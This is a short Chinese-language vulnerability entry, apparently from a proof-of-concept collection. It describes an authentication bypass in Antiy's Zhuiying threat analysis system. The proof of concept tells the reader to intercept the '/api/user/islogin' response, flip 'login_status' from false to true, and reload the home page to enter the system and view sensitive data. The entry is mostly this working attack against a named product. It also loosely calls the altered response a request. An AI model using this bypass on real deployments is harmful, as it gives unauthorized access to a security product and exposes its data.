# 安天追影威脅分析系統越權訪問漏洞/zh-cn
==漏洞描述==
通过修改返回包内容,可以绕过验证,直接登陆系统,可以查看到部分敏感信息.
==POC==
访问威胁分析系统,抓包一条”/api/user/islogin”的请求,返回包的内容为:
{"role": "", "login_status": false, "result": "ok"}
把请求中的 login_status 改为 true
再次访问首页成功进入页面
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容